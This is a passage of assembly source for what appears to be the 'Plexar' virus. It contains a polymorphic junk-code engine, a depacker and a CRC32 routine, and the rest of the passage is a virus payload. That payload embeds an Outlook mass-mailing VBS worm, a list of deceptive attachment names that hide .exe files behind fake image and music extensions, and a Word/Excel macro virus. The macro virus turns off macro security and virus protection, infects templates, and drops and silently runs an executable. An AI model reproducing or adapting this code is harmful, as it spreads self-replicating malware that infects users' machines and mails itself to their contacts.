MOV AL, 0BFh
|
||
STOSB
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AX, 0EF01h
|
||
STOSW
|
||
JMP @Colocar_LEAR
|
||
|
||
@Colocar_LEA_III:
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AL, 05Ah
|
||
STOSB
|
||
MOV AX, 0EA01h
|
||
STOSW
|
||
MOV AX, 0D787h
|
||
STOSW
|
||
JMP @Colocar_LEAR
|
||
|
||
@SumaCuatro:
|
||
|
||
PUSH 04h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @SumaCuatro_I
|
||
CMP EAX, 01h
|
||
JZ @SumaCuatro_II
|
||
CMP EAX, 02h
|
||
JZ @SumaCuatro_III
|
||
CMP EAX, 03h
|
||
JZ @SumaCuatro_IV
|
||
|
||
JMP @SumaCuatro_III
|
||
|
||
@SumaCuatroR:
|
||
|
||
RET
|
||
|
||
@SumaCuatro_I:
|
||
MOV AX, 0C781h
|
||
STOSW
|
||
MOV EAX, 00000004h
|
||
STOSD
|
||
JMP @SumaCuatroR
|
||
|
||
@SumaCuatro_II:
|
||
MOV EAX, 47474747h
|
||
STOSD
|
||
JMP @SumaCuatroR
|
||
|
||
@SumaCuatro_III:
|
||
MOV AL, 47h
|
||
STOSB
|
||
MOV AX, 0C781h
|
||
STOSW
|
||
MOV EAX, 00000002h
|
||
STOSD
|
||
MOV AL, 47h
|
||
STOSB
|
||
JMP @SumaCuatroR
|
||
|
||
@SumaCuatro_IV:
|
||
MOV AX, 0C781h
|
||
STOSW
|
||
MOV EAX, 00000003h
|
||
STOSD
|
||
MOV AL, 47h
|
||
STOSB
|
||
JMP @SumaCuatroR
|
||
|
||
; Generador de basura! Mega Lamer!!!
|
||
|
||
@Basura:
|
||
|
||
PUSH 10d
|
||
POP ECX
|
||
|
||
@BasLoop:
|
||
|
||
PUSH 08d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
|
||
OR EAX, EAX
|
||
JZ @Basura_1
|
||
CMP EAX, 1h
|
||
JZ @Basura_2
|
||
CMP EAX, 2h
|
||
JZ @Basura_3
|
||
CMP EAX, 3h
|
||
JZ @Basura_4
|
||
CMP EAX, 4h
|
||
JZ @Basura_5
|
||
CMP EAX, 5h
|
||
JZ @Basura_6
|
||
CMP EAX, 6h
|
||
JZ @Basura_7
|
||
|
||
JMP @Basura_1
|
||
|
||
@BasuraR:
|
||
|
||
LOOP @BasLoop
|
||
|
||
RET
|
||
|
||
@Basura_1:
|
||
|
||
PUSH 07h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B1_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSB
|
||
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSD
|
||
JMP @BasuraR
|
||
|
||
@B1_Tabla:
|
||
DB 0B8h ; MOV EAX
|
||
DB 0BBh ; MOV EBX
|
||
DB 0BAh ; MOV EDX
|
||
DB 0BEh ; MOV ESI
|
||
DB 005h ; ADD EAX
|
||
DB 02Dh ; SUB EAX
|
||
DB 035h ; XOR EAX
|
||
DB 015h ; ADC EAX
|
||
|
||
@Basura_2:
|
||
|
||
PUSH 15d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
ADD EAX, EAX
|
||
LEA ESI, OFS [@B2_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSD
|
||
|
||
JMP @BasuraR
|
||
|
||
@B2_Tabla:
|
||
DB 081h, 0C3h ; ADD EBX
|
||
DB 081h, 0C2h ; ADD EDX
|
||
DB 081h, 0C6h ; ADD ESI
|
||
DB 081h, 0EBh ; SUB EBX
|
||
DB 081h, 0EAh ; SUB EDX
|
||
DB 081h, 0EEh ; SUB ESI
|
||
DB 081h, 0F6h ; XOR ESI
|
||
DB 081h, 0F2h ; XOR EDX
|
||
DB 081h, 0F3h ; XOR EBX
|
||
DB 081h, 0D3h ; ADC EBX
|
||
DB 081h, 0D2h ; ADC EDX
|
||
DB 081h, 0D6h ; ADC ESI
|
||
DB 069h, 0C0h ; IMUL EAX
|
||
DB 069h, 0DBh ; IMUL EBX
|
||
DB 069h, 0D2h ; IMUL EDX
|
||
DB 069h, 0F6h ; IMUL ESI
|
||
|
||
@Basura_3:
|
||
|
||
PUSH 35d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
ADD EAX, EAX
|
||
LEA ESI, OFS [@B3_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
|
||
JMP @BasuraR
|
||
|
||
@B3_Tabla:
|
||
DB 001h, 0D8h ; ADD EAX, EBX
|
||
DB 001h, 0D0h ; ADD EAX, EDX
|
||
DB 001h, 0F0h ; ADD EAX, ESI
|
||
DB 001h, 0D3h ; ADD EBX, EDX
|
||
DB 001h, 0F3h ; ADD EBX, ESI
|
||
DB 001h, 0C3h ; ADD EBX, EAX
|
||
DB 001h, 0DAh ; ADD EDX, EBX
|
||
DB 001h, 0F2h ; ADD EDX, ESI
|
||
DB 001h, 0C2h ; ADD EDX, EAX
|
||
DB 001h, 0DEh ; ADD ESI, EBX
|
||
DB 001h, 0D6h ; ADD ESI, EDX
|
||
DB 001h, 0C6h ; ADD ESI, EAX
|
||
DB 029h, 0D8h ; SUB EAX, EBX
|
||
DB 029h, 0D0h ; SUB EAX, EDX
|
||
DB 029h, 0F0h ; SUB EAX, ESI
|
||
DB 029h, 0C3h ; SUB EBX, EAX
|
||
DB 029h, 0D3h ; SUB EBX, EDX
|
||
DB 029h, 0F3h ; SUB EBX, ESI
|
||
DB 029h, 0C2h ; SUB EDX, EAX
|
||
DB 029h, 0DAh ; SUB EDX, EBX
|
||
DB 029h, 0F2h ; SUB EDX, ESI
|
||
DB 029h, 0C6h ; SUB ESI, EAX
|
||
DB 029h, 0DEh ; SUB ESI, EBX
|
||
DB 029h, 0D6h ; SUB ESI, EDX
|
||
DB 031h, 0D8h ; XOR EAX, EBX
|
||
DB 031h, 0D0h ; XOR EAX, EDX
|
||
DB 031h, 0F0h ; XOR EAX, ESI
|
||
DB 031h, 0C3h ; XOR EBX, EAX
|
||
DB 031h, 0D3h ; XOR EBX, EDX
|
||
DB 031h, 0F3h ; XOR EBX, ESI
|
||
DB 031h, 0C2h ; XOR EDX, EAX
|
||
DB 031h, 0DAh ; XOR EDX, EBX
|
||
DB 031h, 0F2h ; XOR EDX, ESI
|
||
DB 031h, 0C6h ; XOR ESI, EAX
|
||
DB 031h, 0DEh ; XOR ESI, EBX
|
||
DB 031h, 0D6h ; XOR ESI, EDX
|
||
|
||
@Basura_4:
|
||
MOV AL, 068h ; PUSH
|
||
STOSB
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSD
|
||
|
||
PUSH 03h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B4_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSB
|
||
|
||
JMP @BasuraR
|
||
|
||
@B4_Tabla:
|
||
DB 058h ; POP EAX
|
||
DB 05Bh ; POP EBX
|
||
DB 05Ah ; POP EDX
|
||
DB 05Eh ; POP ESI
|
||
|
||
@Basura_5:
|
||
PUSH 11d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B5_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSB
|
||
|
||
JMP @BasuraR
|
||
|
||
@B5_Tabla:
|
||
DB 040h ; inc eax
|
||
DB 043h ; inc ebx
|
||
DB 042h ; inc edx
|
||
DB 046h ; inc esi
|
||
DB 048h ; dec eax
|
||
DB 04Bh ; dec ebx
|
||
DB 04Ah ; dec edx
|
||
DB 04Eh ; dec esi
|
||
DB 093h ; xchg ebx,eax
|
||
DB 092h ; xchg edx,eax
|
||
DB 096h ; xchg esi,eax
|
||
DB 093h ; xchg ebx,eax
|
||
|
||
@Basura_6:
|
||
PUSH 13d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B6_Tabla]
|
||
ADD EAX, EAX
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
|
||
JMP @BasuraR
|
||
|
||
@B6_Tabla:
|
||
DB 0F7h, 0D0h ; not eax
|
||
DB 0F7h, 0D3h ; not ebx
|
||
DB 0F7h, 0D2h ; not edx
|
||
DB 0F7h, 0D6h ; not esi
|
||
DB 0F7h, 0D8h ; neg eax
|
||
DB 0F7h, 0DBh ; neg ebx
|
||
DB 0F7h, 0DAh ; neg edx
|
||
DB 0F7h, 0DEh ; neg esi
|
||
DB 087h, 0DAh ; xchg ebx,edx
|
||
DB 087h, 0DEh ; xchg ebx,esi
|
||
DB 087h, 0D3h ; xchg edx,ebx
|
||
DB 087h, 0D6h ; xchg edx,esi
|
||
DB 087h, 0F3h ; xchg esi,ebx
|
||
DB 087h, 0F2h ; xchg esi,edx
|
||
|
||
@Basura_7:
|
||
PUSH 31d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B7_Tabla]
|
||
ADD EAX, EAX
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSB
|
||
|
||
JMP @BasuraR
|
||
|
||
@B7_Tabla:
|
||
DB 0C1h, 0D0h ; rcl eax
|
||
DB 0C1h, 0D3h ; rcl ebx
|
||
DB 0C1h, 0D2h ; rcl edx
|
||
DB 0C1h, 0D6h ; rcl esi
|
||
DB 0C1h, 0D8h ; rcr eax
|
||
DB 0C1h, 0DBh ; rcr ebx
|
||
DB 0C1h, 0DAh ; rcr edx
|
||
DB 0C1h, 0DEh ; rcr esi
|
||
DB 0C1h, 0C0h ; rol eax
|
||
DB 0C1h, 0C3h ; rol ebx
|
||
DB 0C1h, 0C2h ; rol edx
|
||
DB 0C1h, 0C6h ; rol esi
|
||
DB 0C1h, 0C8h ; ror eax
|
||
DB 0C1h, 0CBh ; ror ebx
|
||
DB 0C1h, 0CAh ; ror edx
|
||
DB 0C1h, 0CEh ; ror esi
|
||
DB 0C1h, 0E0h ; shl eax
|
||
DB 0C1h, 0E3h ; shl ebx
|
||
DB 0C1h, 0E2h ; shl edx
|
||
DB 0C1h, 0E6h ; shl esi
|
||
DB 0C1h, 0F8h ; sar eax
|
||
DB 0C1h, 0FBh ; sar ebx
|
||
DB 0C1h, 0FAh ; sar edx
|
||
DB 0C1h, 0FEh ; sar esi
|
||
DB 0C1h, 0E0h ; shl eax
|
||
DB 0C1h, 0E3h ; shl ebx
|
||
DB 0C1h, 0E2h ; shl edx
|
||
DB 0C1h, 0E6h ; shl esi
|
||
DB 0C1h, 0E8h ; shr eax
|
||
DB 0C1h, 0EBh ; shr ebx
|
||
DB 0C1h, 0EAh ; shr edx
|
||
DB 0C1h, 0EEh ; shr esi
|
||
|
||
@SaveSemilla DB 8 DUP (00h)
|
||
|
||
Semilla_1 DD 00000000h
|
||
Semilla_2 DD 00000000h
|
||
Llave DD 00000000h
|
||
|
||
Origen DD 00000000h
|
||
Destino DD 00000000h
|
||
Tama¤o DD 00000000h
|
||
|
||
GuardaDelta DD 00000000h
|
||
GuardaDelta2 DD 00000000h
|
||
GuardaLoop DD 00000000h
|
||
|
||
Mierda_1 EQU 1A7FC23Bh
|
||
Mierda_2 EQU 000028B1h
|
||
Mierda_3 EQU 974D9DB5h
|
||
Mierda_4 EQU 0000F3C9h
|
||
|
||
PXPE ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
;***************************************************************
|
||
;* aPLib v0.22b - the smaller the better :) *
|
||
;* WASM & TASM assembler depacker *
|
||
;* *
|
||
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
|
||
;***************************************************************
|
||
|
||
;.386p
|
||
;.MODEL flat
|
||
|
||
;.CODE
|
||
|
||
;PUBLIC _aP_depack_asm
|
||
|
||
_aP_depack_asm:
|
||
push ebp
|
||
mov ebp, esp
|
||
pushad
|
||
push ebp
|
||
|
||
mov esi, [ebp + 8] ; C calling convention
|
||
mov edi, [ebp + 12]
|
||
|
||
cld
|
||
mov dl, 80h
|
||
|
||
literal:
|
||
movsb
|
||
nexttag:
|
||
call getbit
|
||
jnc literal
|
||
|
||
xor ecx, ecx
|
||
call getbit
|
||
jnc codepair
|
||
xor eax, eax
|
||
call getbit
|
||
jnc shortmatch
|
||
mov al, 10h
|
||
getmorebits:
|
||
call getbit
|
||
adc al, al
|
||
jnc getmorebits
|
||
jnz domatch_with_inc
|
||
stosb
|
||
jmp short nexttag
|
||
codepair:
|
||
call getgamma_no_ecx
|
||
dec ecx
|
||
loop normalcodepair
|
||
mov eax,ebp
|
||
call getgamma
|
||
jmp short domatch
|
||
|
||
shortmatch:
|
||
lodsb
|
||
shr eax, 1
|
||
jz donedepacking
|
||
adc ecx, 2
|
||
mov ebp, eax
|
||
jmp short domatch
|
||
|
||
normalcodepair:
|
||
xchg eax, ecx
|
||
dec eax
|
||
shl eax, 8
|
||
lodsb
|
||
mov ebp, eax
|
||
call getgamma
|
||
cmp eax, 32000
|
||
jae domatch_with_2inc
|
||
cmp eax, 1280
|
||
jae domatch_with_inc
|
||
cmp eax, 7fh
|
||
ja domatch
|
||
|
||
domatch_with_2inc:
|
||
inc ecx
|
||
|
||
domatch_with_inc:
|
||
inc ecx
|
||
domatch:
|
||
push esi
|
||
mov esi, edi
|
||
sub esi, eax
|
||
rep movsb
|
||
pop esi
|
||
jmp short nexttag
|
||
|
||
getbit:
|
||
add dl, dl
|
||
jnz stillbitsleft
|
||
mov dl, [esi]
|
||
inc esi
|
||
adc dl, dl
|
||
stillbitsleft:
|
||
ret
|
||
|
||
getgamma:
|
||
xor ecx, ecx
|
||
getgamma_no_ecx:
|
||
inc ecx
|
||
getgammaloop:
|
||
call getbit
|
||
adc ecx, ecx
|
||
call getbit
|
||
jc getgammaloop
|
||
ret
|
||
|
||
donedepacking:
|
||
pop ebp
|
||
sub edi, [ebp + 12]
|
||
mov [ebp - 4], edi ; return unpacked length in eax
|
||
|
||
popad
|
||
pop ebp
|
||
ret
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Billy Belcebu's CRC32 calculator.
|
||
;
|
||
; CRC32 procedure
|
||
; --------------+
|
||
;
|
||
; input:
|
||
; ESI = Offset where code to calculate begins
|
||
; EDI = Size of that code
|
||
; output:
|
||
; EAX = CRC32 of given code
|
||
;
|
||
|
||
CRC32 proc
|
||
cld
|
||
xor ecx,ecx ; Optimized by me - 2 bytes
|
||
dec ecx ; less
|
||
mov edx,ecx
|
||
NextByteCRC:
|
||
xor eax,eax
|
||
xor ebx,ebx
|
||
lodsb
|
||
xor al,cl
|
||
mov cl,ch
|
||
mov ch,dl
|
||
mov dl,dh
|
||
mov dh,8
|
||
NextBitCRC:
|
||
shr bx,1
|
||
rcr ax,1
|
||
jnc NoCRC
|
||
xor ax,08320h
|
||
xor bx,0EDB8h
|
||
NoCRC: dec dh
|
||
jnz NextBitCRC
|
||
xor ecx,eax
|
||
xor edx,ebx
|
||
dec edi ; 1 byte less
|
||
jnz NextByteCRC
|
||
not edx
|
||
not ecx
|
||
mov eax,edx
|
||
rol eax,16
|
||
mov ax,cx
|
||
ret
|
||
CRC32 endp
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Generador de numeros aleatorios para uso general.
|
||
;
|
||
; EBX -> Limite Superior
|
||
|
||
Random PROC
|
||
|
||
PUSH ECX EDX EDI EBX
|
||
|
||
LEA EDI, OFS [Mariconada]
|
||
RDTSC
|
||
STOSD
|
||
PUSH 04h
|
||
POP EDI
|
||
LEA ESI, OFS [Mariconada]
|
||
CALL CRC32
|
||
XCHG EDX, EAX
|
||
|
||
PUSH EDX
|
||
LEA EDI, OFS [Mariconada]
|
||
APICALL GetTickCount
|
||
STOSD
|
||
SUB EDI, 04h
|
||
XCHG EDI, ESI
|
||
PUSH 04h
|
||
POP EDI
|
||
CALL CRC32
|
||
POP EDX
|
||
|
||
PUSH EAX
|
||
OR EAX, EDX
|
||
POP ECX
|
||
AND EDX, ECX
|
||
|
||
XOR EAX, EDX
|
||
|
||
POP EBX
|
||
XOR EDX, EDX
|
||
DIV EBX
|
||
XCHG EDX, EAX
|
||
|
||
POP EDI EDX ECX
|
||
RET
|
||
|
||
Mariconada DB 9 DUP (00h)
|
||
|
||
Random ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; TABLA!
|
||
;
|
||
; Create -> 01h
|
||
; File -> 02h
|
||
; Map -> 03h
|
||
; View -> 04h
|
||
; Close -> 05h
|
||
; Get -> 06h
|
||
; Set -> 07h
|
||
; Find -> 08h
|
||
; Virtual -> 09h
|
||
; Window -> 0Ah
|
||
; Directory -> 0Bh
|
||
; Current -> 0Ch
|
||
; WaitFor -> 0Dh
|
||
; Thread -> 0Eh
|
||
|
||
HThread DD 00000000h
|
||
|
||
APIs_K32 DB 01h, 02h, "A", 00h
|
||
DB 01h, 02h, 03h, "pingA", 00h
|
||
DB 03h, 04h, "Of", 02h, 00h
|
||
DB "Unmap", 04h, "Of", 02h, 00h
|
||
DB 05h, "Handle", 00h
|
||
DB 06h, 02h, "Size", 00h
|
||
DB 07h, 02h, "Pointer", 00h
|
||
DB 07h, "EndOf", 02h, 00h
|
||
DB 07h, 02h, "AttributesA", 00h
|
||
DB "Write", 02h, 00h
|
||
DB 08h, "First", 02h, "A", 00h
|
||
DB 08h, "Next", 02h, "A", 00h
|
||
DB 08h, 05h, 00h
|
||
DB 09h, "Alloc", 00h
|
||
DB 09h, "Free", 00h
|
||
DB 06h, 0Ah, "s", 0Bh, "A", 00h
|
||
DB 06h, 0Ch, 0Bh, "A", 00h
|
||
DB 07h, 0Ch, 0Bh, "A", 00h
|
||
DB 01h, 0Eh, 00h
|
||
DB "Exit", 0Eh, 00h
|
||
DB 0Dh, "MultipleObjects", 00h
|
||
DB 0Dh, "SingleObject", 00h
|
||
DB 06h, "TickCount", 00h
|
||
DB "LoadLibraryA", 00h
|
||
DB "Delete", 02h, "A", 00h
|
||
DB 07h, 0Eh, "Priority", 00h
|
||
DB 0FFh
|
||
|
||
CreateFileA DD 00000000h
|
||
CreateFileMappingA DD 00000000h
|
||
MapViewOfFile DD 00000000h
|
||
UnmapViewOfFile DD 00000000h
|
||
CloseHandle DD 00000000h
|
||
GetFileSize DD 00000000h
|
||
SetFilePointer DD 00000000h
|
||
SetEndOfFile DD 00000000h
|
||
SetFileAttributesA DD 00000000h
|
||
WriteFile DD 00000000h
|
||
FindFirstFileA DD 00000000h
|
||
FindNextFileA DD 00000000h
|
||
FindClose DD 00000000h
|
||
VirtualAlloc DD 00000000h
|
||
VirtualFree DD 00000000h
|
||
GetWindowsDirectoryA DD 00000000h
|
||
GetCurrentDirectoryA DD 00000000h
|
||
SetCurrentDirectoryA DD 00000000h
|
||
CreateThread DD 00000000h
|
||
ExitThread DD 00000000h
|
||
WaitForMultipleObjects DD 00000000h
|
||
WaitForSingleObject DD 00000000h
|
||
GetTickCount DD 00000000h
|
||
LoadLibraryA DD 00000000h
|
||
DeleteFileA DD 00000000h
|
||
SetThreadPriority DD 00000000h
|
||
|
||
KERNEL32 DD 00000000h
|
||
|
||
Thread_Directa DD 00000000h
|
||
Thread_WormVBS DD 00000000h
|
||
Thread_IWord DD 00000000h
|
||
Thread_Host DD 00000000h
|
||
|
||
Listo_Directa DB 00h
|
||
|
||
GetProcAddress DD 00000000h
|
||
Exports DD 00000000h
|
||
|
||
CRC32_GetProcAddress EQU 0FFC97C1Fh
|
||
l_GetProcAddress EQU 0Fh
|
||
|
||
Scriptum DD 00000000h
|
||
GuardaNom DD 00000000h
|
||
LargoVBS DB 00h
|
||
FHandle_WVBS DD 00000000h
|
||
MHandle_WVBS DD 00000000h
|
||
BaseMap_WVBS DD 00000000h
|
||
|
||
Gusano_VBS LABEL NEAR
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Set Outlook = CreateObject("OutLook.Application")', 0Dh, 0Ah
|
||
DB 'If ( Outlook <> "" ) Then', 0Dh, 0Ah
|
||
DB 'With Outlook', 0Dh, 0Ah
|
||
DB 'Set MAPI = .GetNameSpace("MAPI")', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'With MAPI', 0Dh, 0Ah
|
||
DB 'Set AddrList = .AddressLists', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'For I = 1 to AddrList.Count', 0Dh, 0Ah
|
||
DB 'With OutLook', 0Dh, 0Ah
|
||
DB 'Set NuevoMail = .CreateItem(0)', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Set LibroActual = AddrList.Item(I)', 0Dh, 0Ah
|
||
DB 'With NuevoMail', 0Dh, 0Ah
|
||
DB '.Attachments.Add "'
|
||
L_Gusano_VBS EQU $-Gusano_VBS
|
||
|
||
Gusano_VBS2 LABEL NEAR
|
||
DB '"', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Set Yuca = LibroActual.AddressEntries', 0Dh, 0Ah
|
||
DB 'With Yuca', 0Dh, 0Ah
|
||
DB 'For J = 1 to .Count', 0Dh, 0Ah
|
||
DB 'With NuevoMail', 0Dh, 0Ah
|
||
DB 'Set bajo = .Recipients', 0Dh, 0Ah
|
||
DB 'bajo.Add Yuca(J)', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Next', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'With NuevoMail', 0Dh, 0Ah
|
||
DB '.Send', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Next', 0Dh, 0Ah
|
||
DB 'Outlook.Quit', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
L_Gusano_VBS2 EQU $-Gusano_VBS2
|
||
|
||
Nombres_Varios DB "XD", 00h
|
||
DB "Sex.jpg", 20d DUP (" "), ".exe", 00h
|
||
DB "Porno.gif", 20d DUP (" "), ".exe", 00h
|
||
DB "Free_XXX.jpg", 20d DUP (" "), ".exe", 00h
|
||
DB "Great_Music.mp3", 20d DUP (" "), ".exe", 00h
|
||
DB "Check_This.jpg", 20d DUP (" "), ".exe", 00h
|
||
DB "Cool_Pics.gif", 20d DUP (" "), ".exe", 00h
|
||
DB "Love_Story.html", 20d DUP (" "), ".exe", 00h
|
||
DB "Sexy_Screensaver.scr", 00h
|
||
DB "Free_Love_Screensaver.scr", 00h
|
||
DB "Eat_My_Shorts.scr", 00h
|
||
|
||
Raxelp_vbs DB "raxelp.vbs", 00h
|
||
WScript_exe DB "wscript.exe", 00h
|
||
|
||
Tabla_Hex DB "0123456789ABCDEF", 00h
|
||
|
||
FHandle_IW DD 00000000h
|
||
MHandle_IW DD 00000000h
|
||
BaseMap_IW DD 00000000h
|
||
Tama¤o_IW DD 00000000h
|
||
Memoria_IW DD 00000000h
|
||
Macaco DB 13d DUP (00h)
|
||
|
||
Virus_Macro LABEL NEAR
|
||
DB 'Attribute VB_Name = "Plexar"', 0Dh, 0Ah
|
||
DB 'Sub Auto_Open()', 0Dh, 0Ah
|
||
DB 'Application.OnSheetActivate = "InfXL"', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
DB 'Sub InfXL()', 0Dh, 0Ah
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
|
||
DB 'Set VBP = Application.VBE.ActiveVBProject', 0Dh, 0Ah
|
||
DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'Set VBX = VBP.VBComponents', 0Dh, 0Ah
|
||
DB 'With Application: .ScreenUpdating = Not -1: .DisplayStatusBar = Not -1: .EnableCancelKey = Not -1: .DisplayAlerts = Not -1: End With', 0Dh, 0Ah
|
||
DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$": YYY = Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
|
||
DB 'VBX.Item(ZZZ).Export XXX', 0Dh, 0Ah
|
||
DB 'If AXO.Item(ZZZ).Name <> ZZZ Then', 0Dh, 0Ah
|
||
DB ' AXO.Import XXX: AWO.SaveAs AWO.FullName', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'If (Dir(YYY) = "") Then', 0Dh, 0Ah
|
||
DB 'Workbooks.Add.SaveAs YYY', 0Dh, 0Ah
|
||
DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
|
||
DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'AXO.Import XXX', 0Dh, 0Ah
|
||
DB 'ActiveWindow.Visible = Not -1', 0Dh, 0Ah
|
||
DB 'Workbooks("personal.xls").Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'Kill XXX', 0Dh, 0Ah
|
||
DB 'Call Correme', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
DB 'Sub AutoClose()', 0Dh, 0Ah
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$"', 0Dh, 0Ah
|
||
DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'With Options: .VirusProtection = (2 * 4 + 4 / 6 - 2): .ConfirmConversions = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
|
||
DB 'With Application: .DisplayStatusBar = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
|
||
DB 'Set AKT = VBE.ActiveVBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'Set NOX = NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'Set DOX = ActiveDocument.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'AKT.Item(ZZZ).Export XXX', 0Dh, 0Ah
|
||
DB 'If (NOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
|
||
DB 'NOX.Import XXX', 0Dh, 0Ah
|
||
DB 'NormalTemplate.Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'If (DOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
|
||
DB 'DOX.Import XXX', 0Dh, 0Ah
|
||
DB 'ActiveDocument.SaveAs ActiveDocument.FullName', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'Kill XXX', 0Dh, 0Ah
|
||
DB 'Call Correme', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
DB 'Private Sub Correme()', 0Dh, 0Ah
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Dim joda as String', 0Dh, 0Ah
|
||
DB 'Dim X as String', 0Dh, 0Ah
|
||
DB 'joda = "'
|
||
L_Virus_Macro EQU $-Virus_Macro
|
||
|
||
Virus_Macro_2 LABEL NEAR
|
||
DB 'For o = 1 to Len(joda) Step 2', 0Dh, 0Ah
|
||
DB 'X = X + Chr("&h" + Mid(Joda, o, 2))', 0Dh, 0Ah
|
||
DB 'Next', 0Dh, 0Ah
|
||
DB 'raxname = Environ("windir") & "\raxelp.exe"', 0Dh, 0Ah
|
||
DB 'Open raxname For Binary As #1', 0Dh, 0Ah
|
||
DB 'Put #1, 1, X$', 0Dh, 0Ah
|
||
DB 'Close #1', 0Dh, 0Ah
|
||
DB 'xoxo = Shell(raxname, 0)', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
L_Virus_Macro_2 EQU $-Virus_Macro_2
|
||
|
||
Nihil DB 00h
|
||
Memoria DD 00000000h
|
||
Raxelp_$$$ DB "c:\raxelp.$$$", 00h
|
||
Plxwrd_vbs DB "plxwrd.vbs", 00h
|
||
|
||
Macro_VBS LABEL NEAR
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Set word = CreateObject("Word.Application")', 0Dh, 0Ah
|
||
DB 'If ( word <> "" ) Then', 0Dh, 0Ah
|
||
